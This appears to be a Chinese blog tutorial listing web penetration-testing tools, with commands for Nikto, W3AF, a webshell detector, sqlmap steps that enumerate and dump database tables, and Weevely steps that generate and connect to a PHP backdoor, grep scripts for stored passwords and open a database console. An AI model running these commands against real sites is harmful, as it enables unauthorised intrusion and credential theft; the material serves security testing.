常见的Web渗透测试工具_(2)若(2)若要远程查看网站服务器的开放端口信息,可使用什么工具

90 阅读1分钟

这里写图片描述

二、使用Nikto来收集漏洞信息

#官方网站:https://cirt.net/nikto2

#wget https://cirt.net/nikto/nikto-2.1.5.tar.gz (解压就可以用)


$ perl nikto.pl -h hack-test.com(ip或者域名)

这里写图片描述

三、用Backtrack 5 R1中的W3AF(Web应用扫描器或者叫做安全审计工具)

官方网站:http://sourceforge.net/projects/w3af/
建议下载window版本,linux需要安装python的好多依赖包,需要调试的比较多


#linux环境安装

$ git clone https://github.com/andresriancho/w3af.git

$ cd w3af/

$ ./w3af_console

$ /tmp/w3af_dependency_install.sh

这里写图片描述

后面我用的是windows版本测试的:
这里写图片描述

四、Sqlmap来检测url是否存在SQL注入

$ python sqlmap.py  –u url地址


#加入参数"-dbs"来尝试采集数据库名

$ python sqlmap.py  –u url地址 -dbs


#参数"-D 库名 --tables"来查看改数据库的所有表名

$ python sqlmap.py  –u url地址 -D 库名 --tables


#参数"-T 表名 --columns"来查看表中的字段

$ python sqlmap.py  –u url地址 -D 库名 -T 表名 --columns


#参数"-C 列名1,列名2 --dump"来查看值

$ ython sqlmap.py  –u url地址 -D 库名 -T 表名 -C 列名1,列名2 --dump

五、WebShell|网站后门检测工具

官网地址:http://www.webshell.pub/
#可以在线检测,也可以下载客户端
#我用客户端检测了下我们服务器的代码,蛮好用的

#在linux上运行命令
$ ./hm scan 网站根目录

六、Weevely(生成php后门工具)

下载地址: https://github.com/epinna/Weevely3

$ git clone https://github.com/epinna/weevely3.git

$ cd weevely3


#生成一个后门木马hello.php,密码为test

$ ./weevely.py generate test hello.php

这里写图片描述

#连接后门

$ ./weevely.py http://url地址/hello.php test

这里写图片描述

连接后操作命令
#查看系统信息
$ system.info

#获取数据库连接信息
$ grep . '^[^\*/#]\*passw?o?r?d?'    #使用grep命令查找其他用户存储在php脚本中的密码
$ grep . 'mysql\_conn'              #连接数据库的语句
$ :sql\_console -user 用户名 -passwd 密码 -host 数据库地址        #使用sql\_console模块来连接数据库

#绕过策略读取/etc/passwd